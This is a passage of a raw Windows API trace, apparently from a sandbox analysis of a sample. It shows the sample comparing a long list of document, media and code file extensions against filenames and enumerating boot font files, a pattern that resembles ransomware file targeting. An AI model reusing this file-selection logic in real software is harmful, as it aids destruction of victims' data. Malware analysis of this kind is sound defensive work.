[0285.577] lstrlenW (lpString=".djvu") returned 5 [0285.577] lstrcmpiW (lpString1=".djvu", lpString2="t.ttf") returned -1 [0285.577] lstrlenW (lpString=".dng") returned 4 [0285.577] lstrcmpiW (lpString1=".dng", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".doc") returned 4 [0285.577] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".docm") returned 5 [0285.577] lstrcmpiW (lpString1=".docm", lpString2="t.ttf") returned -1 [0285.577] lstrlenW (lpString=".docx") returned 5 [0285.577] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.577] lstrlenW (lpString=".dot") returned 4 [0285.578] lstrcmpiW (lpString1=".dot", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".dotm") returned 5 [0285.578] lstrcmpiW (lpString1=".dotm", lpString2="t.ttf") returned -1 [0285.578] lstrlenW (lpString=".dotx") returned 5 [0285.578] lstrcmpiW (lpString1=".dotx", lpString2="t.ttf") returned -1 [0285.578] lstrlenW (lpString=".dpx") returned 4 [0285.578] lstrcmpiW (lpString1=".dpx", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".dqy") returned 4 [0285.578] lstrcmpiW (lpString1=".dqy", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".dsn") returned 4 [0285.578] lstrcmpiW (lpString1=".dsn", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".dt") returned 3 [0285.578] lstrcmpiW (lpString1=".dt", lpString2="ttf") returned -1 [0285.578] lstrlenW (lpString=".dtd") returned 4 [0285.578] lstrcmpiW (lpString1=".dtd", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".dwg") returned 4 [0285.578] lstrcmpiW (lpString1=".dwg", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".dwt") returned 4 [0285.578] lstrcmpiW (lpString1=".dwt", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".dx") returned 3 [0285.578] lstrcmpiW (lpString1=".dx", lpString2="ttf") returned -1 [0285.578] lstrlenW (lpString=".dxf") returned 4 [0285.578] lstrcmpiW (lpString1=".dxf", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".edml") returned 5 [0285.578] lstrcmpiW (lpString1=".edml", lpString2="t.ttf") returned -1 [0285.578] lstrlenW (lpString=".efd") returned 4 [0285.578] lstrcmpiW (lpString1=".efd", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".elf") returned 4 [0285.578] lstrcmpiW (lpString1=".elf", lpString2=".ttf") returned -1 [0285.578] lstrlenW (lpString=".emf") returned 4 [0285.579] lstrcmpiW (lpString1=".emf", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".emz") returned 4 [0285.579] lstrcmpiW (lpString1=".emz", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".epf") returned 4 [0285.579] lstrcmpiW (lpString1=".epf", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".eps") returned 4 [0285.579] lstrcmpiW (lpString1=".eps", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".epsf") returned 5 [0285.579] lstrcmpiW (lpString1=".epsf", lpString2="t.ttf") returned -1 [0285.579] lstrlenW (lpString=".epsp") returned 5 [0285.579] lstrcmpiW (lpString1=".epsp", lpString2="t.ttf") returned -1 [0285.579] lstrlenW (lpString=".erf") returned 4 [0285.579] lstrcmpiW (lpString1=".erf", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".exr") returned 4 [0285.579] lstrcmpiW (lpString1=".exr", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".f4v") returned 4 [0285.579] lstrcmpiW (lpString1=".f4v", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".fido") returned 5 [0285.579] lstrcmpiW (lpString1=".fido", lpString2="t.ttf") returned -1 [0285.579] lstrlenW (lpString=".flm") returned 4 [0285.579] lstrcmpiW (lpString1=".flm", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".flv") returned 4 [0285.579] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".frm") returned 4 [0285.579] lstrcmpiW (lpString1=".frm", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".fxg") returned 4 [0285.579] lstrcmpiW (lpString1=".fxg", lpString2=".ttf") returned -1 [0285.579] lstrlenW (lpString=".geo") returned 4 [0285.579] lstrcmpiW (lpString1=".geo", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".gif") returned 4 [0285.580] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".grs") returned 4 [0285.580] lstrcmpiW (lpString1=".grs", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".gz") returned 3 [0285.580] lstrcmpiW (lpString1=".gz", lpString2="ttf") returned -1 [0285.580] lstrlenW (lpString=".h") returned 2 [0285.580] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0285.580] lstrlenW (lpString=".hdr") returned 4 [0285.580] lstrcmpiW (lpString1=".hdr", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".hpp") returned 4 [0285.580] lstrcmpiW (lpString1=".hpp", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".hta") returned 4 [0285.580] lstrcmpiW (lpString1=".hta", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".htc") returned 4 [0285.580] lstrcmpiW (lpString1=".htc", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".htm") returned 4 [0285.580] lstrcmpiW (lpString1=".htm", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".html") returned 5 [0285.580] lstrcmpiW (lpString1=".html", lpString2="t.ttf") returned -1 [0285.580] lstrlenW (lpString=".icb") returned 4 [0285.580] lstrcmpiW (lpString1=".icb", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".ics") returned 4 [0285.580] lstrcmpiW (lpString1=".ics", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".iff") returned 4 [0285.580] lstrcmpiW (lpString1=".iff", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".inc") returned 4 [0285.580] lstrcmpiW (lpString1=".inc", lpString2=".ttf") returned -1 [0285.580] lstrlenW (lpString=".indd") returned 5 [0285.580] lstrcmpiW (lpString1=".indd", lpString2="t.ttf") returned -1 [0285.581] lstrlenW (lpString=".ini") returned 4 [0285.581] lstrcmpiW (lpString1=".ini", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".iqy") returned 4 [0285.581] lstrcmpiW (lpString1=".iqy", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".j2c") returned 4 [0285.581] lstrcmpiW (lpString1=".j2c", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".j2k") returned 4 [0285.581] lstrcmpiW (lpString1=".j2k", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".java") returned 5 [0285.581] lstrcmpiW (lpString1=".java", lpString2="t.ttf") returned -1 [0285.581] lstrlenW (lpString=".jp2") returned 4 [0285.581] lstrcmpiW (lpString1=".jp2", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".jpc") returned 4 [0285.581] lstrcmpiW (lpString1=".jpc", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".jpe") returned 4 [0285.581] lstrcmpiW (lpString1=".jpe", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".jpeg") returned 5 [0285.581] lstrcmpiW (lpString1=".jpeg", lpString2="t.ttf") returned -1 [0285.581] lstrlenW (lpString=".jpf") returned 4 [0285.581] lstrcmpiW (lpString1=".jpf", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".jpg") returned 4 [0285.581] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".jpx") returned 4 [0285.581] lstrcmpiW (lpString1=".jpx", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".js") returned 3 [0285.581] lstrcmpiW (lpString1=".js", lpString2="ttf") returned -1 [0285.581] lstrlenW (lpString=".jsf") returned 4 [0285.581] lstrcmpiW (lpString1=".jsf", lpString2=".ttf") returned -1 [0285.581] lstrlenW (lpString=".json") returned 5 [0285.581] lstrcmpiW (lpString1=".json", lpString2="t.ttf") returned -1 [0285.582] lstrlenW (lpString=".jsp") returned 4 [0285.582] lstrcmpiW (lpString1=".jsp", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".kdc") returned 4 [0285.582] lstrcmpiW (lpString1=".kdc", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".kmz") returned 4 [0285.582] lstrcmpiW (lpString1=".kmz", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".kwm") returned 4 [0285.582] lstrcmpiW (lpString1=".kwm", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".lasso") returned 6 [0285.582] lstrcmpiW (lpString1=".lasso", lpString2="ot.ttf") returned -1 [0285.582] lstrlenW (lpString=".lbi") returned 4 [0285.582] lstrcmpiW (lpString1=".lbi", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".lgf") returned 4 [0285.582] lstrcmpiW (lpString1=".lgf", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".lgp") returned 4 [0285.582] lstrcmpiW (lpString1=".lgp", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".log") returned 4 [0285.582] lstrcmpiW (lpString1=".log", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".m1v") returned 4 [0285.582] lstrcmpiW (lpString1=".m1v", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".m4a") returned 4 [0285.582] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".m4v") returned 4 [0285.582] lstrcmpiW (lpString1=".m4v", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".max") returned 4 [0285.582] lstrcmpiW (lpString1=".max", lpString2=".ttf") returned -1 [0285.582] lstrlenW (lpString=".md") returned 3 [0285.582] lstrcmpiW (lpString1=".md", lpString2="ttf") returned -1 [0285.583] lstrlenW (lpString=".mda") returned 4 [0285.583] lstrcmpiW (lpString1=".mda", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mdb") returned 4 [0285.583] lstrcmpiW (lpString1=".mdb", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mde") returned 4 [0285.583] lstrcmpiW (lpString1=".mde", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mdf") returned 4 [0285.583] lstrcmpiW (lpString1=".mdf", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mdw") returned 4 [0285.583] lstrcmpiW (lpString1=".mdw", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mef") returned 4 [0285.583] lstrcmpiW (lpString1=".mef", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mft") returned 4 [0285.583] lstrcmpiW (lpString1=".mft", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mfw") returned 4 [0285.583] lstrcmpiW (lpString1=".mfw", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mht") returned 4 [0285.583] lstrcmpiW (lpString1=".mht", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mhtml") returned 6 [0285.583] lstrcmpiW (lpString1=".mhtml", lpString2="ot.ttf") returned -1 [0285.583] lstrlenW (lpString=".mka") returned 4 [0285.583] lstrcmpiW (lpString1=".mka", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mkidx") returned 6 [0285.583] lstrcmpiW (lpString1=".mkidx", lpString2="ot.ttf") returned -1 [0285.583] lstrlenW (lpString=".mkv") returned 4 [0285.583] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0285.583] lstrlenW (lpString=".mos") returned 4 [0285.583] lstrcmpiW (lpString1=".mos", lpString2=".ttf") returned -1 [0285.584] lstrlenW (lpString=".mov") returned 4 [0285.584] lstrcmpiW (lpString1=".mov", lpString2=".ttf") returned -1 [0285.584] lstrlenW (lpString=".mp3") returned 4 [0285.584] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0285.584] lstrlenW (lpString=".mp4") returned 4 [0285.584] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0285.584] lstrlenW (lpString=".mpeg") returned 5 [0285.785] lstrcmpiW (lpString1=".mpeg", lpString2="t.ttf") returned -1 [0285.785] lstrlenW (lpString=".mpg") returned 4 [0285.785] lstrcmpiW (lpString1=".mpg", lpString2=".ttf") returned -1 [0285.785] lstrlenW (lpString=".mpv") returned 4 [0285.785] lstrcmpiW (lpString1=".mpv", lpString2=".ttf") returned -1 [0285.785] lstrlenW (lpString=".mrw") returned 4 [0285.785] lstrcmpiW (lpString1=".mrw", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".msg") returned 4 [0285.786] lstrcmpiW (lpString1=".msg", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".mxl") returned 4 [0285.786] lstrcmpiW (lpString1=".mxl", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".myd") returned 4 [0285.786] lstrcmpiW (lpString1=".myd", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".myi") returned 4 [0285.786] lstrcmpiW (lpString1=".myi", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".nef") returned 4 [0285.786] lstrcmpiW (lpString1=".nef", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".nrw") returned 4 [0285.786] lstrcmpiW (lpString1=".nrw", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".obj") returned 4 [0285.786] lstrcmpiW (lpString1=".obj", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".odb") returned 4 [0285.786] lstrcmpiW (lpString1=".odb", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".odc") returned 4 [0285.786] lstrcmpiW (lpString1=".odc", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".odm") returned 4 [0285.786] lstrcmpiW (lpString1=".odm", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".odp") returned 4 [0285.786] lstrcmpiW (lpString1=".odp", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".ods") returned 4 [0285.786] lstrcmpiW (lpString1=".ods", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".oft") returned 4 [0285.786] lstrcmpiW (lpString1=".oft", lpString2=".ttf") returned -1 [0285.786] lstrlenW (lpString=".one") returned 4 [0285.786] lstrcmpiW (lpString1=".one", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".onepkg") returned 7 [0285.787] lstrcmpiW (lpString1=".onepkg", lpString2="oot.ttf") returned -1 [0285.787] lstrlenW (lpString=".onetoc2") returned 8 [0285.787] lstrcmpiW (lpString1=".onetoc2", lpString2="boot.ttf") returned -1 [0285.787] lstrlenW (lpString=".opt") returned 4 [0285.787] lstrcmpiW (lpString1=".opt", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".oqy") returned 4 [0285.787] lstrcmpiW (lpString1=".oqy", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".orf") returned 4 [0285.787] lstrcmpiW (lpString1=".orf", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".p12") returned 4 [0285.787] lstrcmpiW (lpString1=".p12", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".p7b") returned 4 [0285.787] lstrcmpiW (lpString1=".p7b", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".p7c") returned 4 [0285.787] lstrcmpiW (lpString1=".p7c", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".pam") returned 4 [0285.787] lstrcmpiW (lpString1=".pam", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".pbm") returned 4 [0285.787] lstrcmpiW (lpString1=".pbm", lpString2=".ttf") returned -1 [0285.787] lstrlenW (lpString=".pct") returned 4 [0285.787] lstrcmpiW (lpString1=".pct", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pcx") returned 4 [0285.788] lstrcmpiW (lpString1=".pcx", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pdd") returned 4 [0285.788] lstrcmpiW (lpString1=".pdd", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pdf") returned 4 [0285.788] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pdp") returned 4 [0285.788] lstrcmpiW (lpString1=".pdp", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pef") returned 4 [0285.788] lstrcmpiW (lpString1=".pef", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pem") returned 4 [0285.788] lstrcmpiW (lpString1=".pem", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pff") returned 4 [0285.788] lstrcmpiW (lpString1=".pff", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pfm") returned 4 [0285.788] lstrcmpiW (lpString1=".pfm", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pfx") returned 4 [0285.788] lstrcmpiW (lpString1=".pfx", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".pgm") returned 4 [0285.788] lstrcmpiW (lpString1=".pgm", lpString2=".ttf") returned -1 [0285.788] lstrlenW (lpString=".php") returned 4 [0285.788] lstrcmpiW (lpString1=".php", lpString2=".ttf") returned -1 [0285.789] lstrlenW (lpString=".php3") returned 5 [0285.789] lstrcmpiW (lpString1=".php3", lpString2="t.ttf") returned -1 [0285.789] lstrlenW (lpString=".php4") returned 5 [0285.789] lstrcmpiW (lpString1=".php4", lpString2="t.ttf") returned -1 [0285.789] lstrlenW (lpString=".php5") returned 5 [0285.789] lstrcmpiW (lpString1=".php5", lpString2="t.ttf") returned -1 [0285.789] lstrlenW (lpString=".phtml") returned 6 [0285.789] lstrcmpiW (lpString1=".phtml", lpString2="ot.ttf") returned -1 [0285.789] lstrlenW (lpString=".pict") returned 5 [0285.789] lstrcmpiW (lpString1=".pict", lpString2="t.ttf") returned -1 [0285.789] lstrlenW (lpString=".pl") returned 3 [0285.789] lstrcmpiW (lpString1=".pl", lpString2="ttf") returned -1 [0285.789] lstrlenW (lpString=".pls") returned 4 [0285.789] lstrcmpiW (lpString1=".pls", lpString2=".ttf") returned -1 [0285.789] lstrlenW (lpString=".pm") returned 3 [0285.789] lstrcmpiW (lpString1=".pm", lpString2="ttf") returned -1 [0285.789] lstrlenW (lpString=".png") returned 4 [0285.789] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0285.789] lstrlenW (lpString=".pnm") returned 4 [0285.789] lstrcmpiW (lpString1=".pnm", lpString2=".ttf") returned -1 [0285.789] lstrlenW (lpString=".pot") returned 4 [0285.789] lstrcmpiW (lpString1=".pot", lpString2=".ttf") returned -1 [0285.789] lstrlenW (lpString=".potm") returned 5 [0285.789] lstrcmpiW (lpString1=".potm", lpString2="t.ttf") returned -1 [0285.789] lstrlenW (lpString=".potx") returned 5 [0285.790] lstrcmpiW (lpString1=".potx", lpString2="t.ttf") returned -1 [0285.790] lstrlenW (lpString=".ppa") returned 4 [0285.790] lstrcmpiW (lpString1=".ppa", lpString2=".ttf") returned -1 [0285.790] lstrlenW (lpString=".ppam") returned 5 [0285.790] lstrcmpiW (lpString1=".ppam", lpString2="t.ttf") returned -1 [0285.790] lstrlenW (lpString=".ppm") returned 4 [0285.790] lstrcmpiW (lpString1=".ppm", lpString2=".ttf") returned -1 [0285.790] lstrlenW (lpString=".pps") returned 4 [0285.790] lstrcmpiW (lpString1=".pps", lpString2=".ttf") returned -1 [0285.790] lstrlenW (lpString=".ppsm") returned 5 [0285.790] lstrcmpiW (lpString1=".ppsm", lpString2="t.ttf") returned -1 [0285.790] lstrlenW (lpString=".ppt") returned 4 [0285.790] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.790] lstrlenW (lpString=".pptm") returned 5 [0285.790] lstrcmpiW (lpString1=".pptm", lpString2="t.ttf") returned -1 [0285.790] lstrlenW (lpString=".pptx") returned 5 [0285.790] lstrcmpiW (lpString1=".pptx", lpString2="t.ttf") returned -1 [0285.790] lstrlenW (lpString=".prn") returned 4 [0285.790] lstrcmpiW (lpString1=".prn", lpString2=".ttf") returned -1 [0285.790] lstrlenW (lpString=".ps") returned 3 [0285.790] lstrcmpiW (lpString1=".ps", lpString2="ttf") returned -1 [0285.790] lstrlenW (lpString=".psb") returned 4 [0285.790] lstrcmpiW (lpString1=".psb", lpString2=".ttf") returned -1 [0285.790] lstrlenW (lpString=".psd") returned 4 [0285.790] lstrcmpiW (lpString1=".psd", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".pst") returned 4 [0285.791] lstrcmpiW (lpString1=".pst", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".ptx") returned 4 [0285.791] lstrcmpiW (lpString1=".ptx", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".pub") returned 4 [0285.791] lstrcmpiW (lpString1=".pub", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".pwm") returned 4 [0285.791] lstrcmpiW (lpString1=".pwm", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".pxr") returned 4 [0285.791] lstrcmpiW (lpString1=".pxr", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".py") returned 3 [0285.791] lstrcmpiW (lpString1=".py", lpString2="ttf") returned -1 [0285.791] lstrlenW (lpString=".qt") returned 3 [0285.791] lstrcmpiW (lpString1=".qt", lpString2="ttf") returned -1 [0285.791] lstrlenW (lpString=".r3d") returned 4 [0285.791] lstrcmpiW (lpString1=".r3d", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".raf") returned 4 [0285.791] lstrcmpiW (lpString1=".raf", lpString2=".ttf") returned -1 [0285.791] lstrlenW (lpString=".rar") returned 4 [0285.791] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.791] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0285.792] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0285.792] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0285.792] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0285.792] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0285.793] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0285.793] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0285.793] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0285.793] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0285.794] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0285.794] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0285.794] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, 